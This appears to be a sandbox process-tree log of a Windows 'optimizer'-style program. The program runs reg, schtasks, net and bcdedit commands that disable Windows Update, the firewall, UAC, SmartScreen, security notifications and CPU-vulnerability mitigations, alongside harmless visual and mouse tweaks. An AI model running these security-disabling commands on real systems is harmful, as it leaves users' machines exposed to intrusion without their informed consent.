"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d "1" /f
2⤵
PID:3876

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d "1" /f
3⤵
PID:1472

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotificationOnLockScreen" /t REG_DWORD /d "1" /f
2⤵
PID:2464

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3708

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotificationOnLockScreen" /t REG_DWORD /d "1" /f
3⤵
PID:5108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /F /FI "IMAGENAME eq SystemSettings.exe"
2⤵
- Modifies security service
PID:4324

C:\Windows\system32\taskkill.exe
taskkill /F /FI "IMAGENAME eq SystemSettings.exe"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3180

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c net stop wuauserv & net stop UsoSvc
2⤵
PID:5008

C:\Windows\system32\net.exe
net stop wuauserv
3⤵
PID:1680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wuauserv
4⤵
PID:4248

C:\Windows\system32\net.exe
net stop UsoSvc
3⤵
PID:4884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UsoSvc
4⤵
PID:4900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations" /DISABLE
2⤵
PID:3492

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\WindowsUpdate\DoNotConnectToWindowsUpdateInternetLocations" /DISABLE
3⤵
PID:4048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\SetDisableUXWUAccess" /DISABLE
2⤵
PID:2172

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\WindowsUpdate\SetDisableUXWUAccess" /DISABLE
3⤵
PID:756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\ExcludeWUDriversInQualityUpdate" /DISABLE
2⤵
PID:3212

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\WindowsUpdate\ExcludeWUDriversInQualityUpdate" /DISABLE
3⤵
PID:2260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate" /DISABLE
2⤵
PID:3088

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate" /DISABLE
3⤵
PID:2392

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /DISABLE
2⤵
PID:1408

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /DISABLE
3⤵
PID:3312

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Start Oobe Expedite Work" /DISABLE
2⤵
PID:3616

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Start Oobe Expedite Work" /DISABLE
3⤵
PID:1900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /DISABLE
2⤵
PID:5056

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /DISABLE
3⤵
PID:1068

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /DISABLE
2⤵
PID:2736

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /DISABLE
3⤵
PID:5024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\UpdateModelTask" /DISABLE
2⤵
PID:2276

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\UpdateOrchestrator\UpdateModelTask" /DISABLE
3⤵
PID:4688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WaaSMedic\PerformRemediation" /DISABLE
2⤵
PID:3368

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\WaaSMedic\PerformRemediation" /DISABLE
3⤵
PID:3808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
2⤵
PID:5100

C:\Windows\system32\schtasks.exe
schtasks /change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:3824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2460

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f
3⤵
- Modifies security service
PID:2780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4304

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:4248

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4148

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:4572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:5084

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:3700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4828

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:928

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rd /s /q C:\Windows\SoftwareDistribution
2⤵
PID:3900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c md C:\Windows\SoftwareDistribution
2⤵
PID:2260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d "0" /f
2⤵
PID:64

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d "0" /f
3⤵
- Modifies firewall policy service
PID:2548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v "EnableFirewall" /t REG_DWORD /d "0" /f
2⤵
PID:448

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v "EnableFirewall" /t REG_DWORD /d "0" /f
3⤵
- Modifies firewall policy service
PID:4340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseSpeed" /t REG_DWORD /d "0" /f
2⤵
PID:2204

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseSpeed" /t REG_DWORD /d "0" /f
3⤵
PID:2424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseThreshold1" /t REG_DWORD /d "0" /f
2⤵
PID:4392

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseThreshold1" /t REG_DWORD /d "0" /f
3⤵
PID:5024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseThreshold2" /t REG_DWORD /d "0" /f
2⤵
PID:848

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseThreshold2" /t REG_DWORD /d "0" /f
3⤵
PID:4688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseSensitivity" /t REG_DWORD /d "6" /f
2⤵
PID:3724

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v "MouseSensitivity" /t REG_DWORD /d "6" /f
3⤵
PID:3108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
2⤵
PID:1988

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
3⤵
PID:3132

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
2⤵
PID:2720

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
3⤵
PID:2504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
2⤵
PID:3280

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
3⤵
PID:5104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableInstallerDetection" /t REG_DWORD /d "0" /f
2⤵
PID:4900

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableInstallerDetection" /t REG_DWORD /d "0" /f
3⤵
PID:3532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableSecureUIAPaths" /t REG_DWORD /d "0" /f
2⤵
PID:3880

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableSecureUIAPaths" /t REG_DWORD /d "0" /f
3⤵
PID:5060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "FilterAdministratorToken" /t REG_DWORD /d "0" /f
2⤵
PID:2272

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "FilterAdministratorToken" /t REG_DWORD /d "0" /f
3⤵
PID:4232

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
2⤵
PID:3016

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
3⤵
PID:1936

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching" /v "SearchOrderConfig" /t REG_DWORD /d "0" /f
2⤵
PID:1656

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching" /v "SearchOrderConfig" /t REG_DWORD /d "0" /f
3⤵
PID:4652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "ExcludeWUDriversInQualityUpdate" /t REG_DWORD /d "1" /f
2⤵
PID:3784

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "ExcludeWUDriversInQualityUpdate" /t REG_DWORD /d "1" /f
3⤵
PID:704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverride" /t REG_DWORD /d "3" /f
2⤵
PID:804

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverride" /t REG_DWORD /d "3" /f
3⤵
PID:3620

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverrideMask" /t REG_DWORD /d "3" /f
2⤵
PID:3488

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettingsOverrideMask" /t REG_DWORD /d "3" /f
3⤵
PID:4688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettings" /t REG_DWORD /d "1" /f
2⤵
PID:2368

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "FeatureSettings" /t REG_DWORD /d "1" /f
3⤵
PID:3108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel" /v "DisableTsx" /t REG_DWORD /d "1" /f
2⤵
PID:2300

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel" /v "DisableTsx" /t REG_DWORD /d "1" /f
3⤵
PID:5108

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
2⤵
PID:3824

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
3⤵
PID:1064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
2⤵
PID:4248

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
3⤵
PID:4516

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f
2⤵
PID:2624

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f
3⤵
PID:1432

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f
2⤵
PID:2532

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK" /t REG_DWORD /d "0" /f
3⤵
PID:1268

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_TOASTS_ENABLED" /t REG_DWORD /d "0" /f
2⤵
PID:436

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v "NOC_GLOBAL_SETTING_TOASTS_ENABLED" /t REG_DWORD /d "0" /f
3⤵
PID:1504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
2⤵
PID:3092

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
3⤵
PID:4104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
2⤵
PID:3504

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
3⤵
PID:1792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
2⤵
PID:3996

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
3⤵
PID:3312

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
2⤵
PID:3840

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f
3⤵
PID:1152

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d "1" /f
2⤵
PID:1056

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoToastApplicationNotification" /t REG_DWORD /d "1" /f
3⤵
PID:2228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoTileApplicationNotification" /t REG_DWORD /d "1" /f
2⤵
PID:3584

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\PushNotifications" /v "NoTileApplicationNotification" /t REG_DWORD /d "1" /f
3⤵
PID:3156

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
2⤵
PID:1960

C:\Windows\system32\reg.exe
Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
3⤵
PID:3132

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f
2⤵
PID:1644

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f
3⤵
PID:2060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t REG_DWORD /d "0" /f
2⤵
PID:2288

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t REG_DWORD /d "0" /f
3⤵
PID:4964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\Maps" /v "AutoUpdateEnabled" /t REG_DWORD /d "0" /f
2⤵
PID:2316

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\Maps" /v "AutoUpdateEnabled" /t REG_DWORD /d "0" /f
3⤵
PID:3564

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsStore" /v "AutoDownload" /t REG_DWORD /d "2" /f
2⤵
PID:2776

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsStore" /v "AutoDownload" /t REG_DWORD /d "2" /f
3⤵
PID:3588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "EnableTransparency" /t REG_DWORD /d "0" /f
2⤵
PID:3460

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v "EnableTransparency" /t REG_DWORD /d "0" /f
3⤵
PID:928

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\GameBar" /v "AutoGameModeEnabled" /t REG_DWORD /d "1" /f
2⤵
PID:2748

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\GameBar" /v "AutoGameModeEnabled" /t REG_DWORD /d "1" /f
3⤵
PID:1792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f
2⤵
PID:2548

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f
3⤵
PID:1472

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewAlphaSelect" /t REG_DWORD /d "0" /f
2⤵
PID:3104

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewAlphaSelect" /t REG_DWORD /d "0" /f
3⤵
PID:4588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "0" /f
2⤵
PID:3108

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "0" /f
3⤵
PID:3508

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg Add "HKCU\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /d 0 /f
2⤵
PID:4028

C:\Windows\system32\reg.exe
Reg Add "HKCU\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /d 0 /f
3⤵
PID:3196

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg Add "HKCU\Control Panel\Desktop" /v "DragFullWindows" /d 1 /f
2⤵
PID:4964

C:\Windows\system32\reg.exe
Reg Add "HKCU\Control Panel\Desktop" /v "DragFullWindows" /d 1 /f
3⤵
PID:3564

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewShadow" /t REG_DWORD /d "1" /f
2⤵
PID:2340

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewShadow" /t REG_DWORD /d "1" /f
3⤵
PID:3520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "FontSmoothing" /t REG_SZ /d "2" /f
2⤵
PID:4800

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "FontSmoothing" /t REG_SZ /d "2" /f
3⤵
PID:1952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" /v "VisualFXSetting" /t REG_DWORD /d "3" /f
2⤵
PID:1132

C:\Windows\system32\reg.exe
Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" /v "VisualFXSetting" /t REG_DWORD /d "3" /f
3⤵
PID:2228

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WSearch" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:4848

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WSearch" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:2968

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_DWORD /d "506" /f
2⤵
PID:2724

C:\Windows\system32\reg.exe
Reg.exe add "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_DWORD /d "506" /f
3⤵
PID:5108

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c bcdedit /set disabledynamictick yes
2⤵
PID:3132

C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick yes
3⤵
- Modifies boot configuration data using bcdedit
PID:692

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c bcdedit /set useplatformtick yes
2⤵
PID:2696

C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick yes
3⤵
- Modifies boot configuration data using bcdedit
PID:4632

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c Reg.exe add "HKCU\SOFTWARE\Microsoft\GameBar" /v "GamePanelStartupTipIndex" /t REG_DWORD /d "3" /f
2⤵
PID:5004

C:\Windows\system32\reg.exe
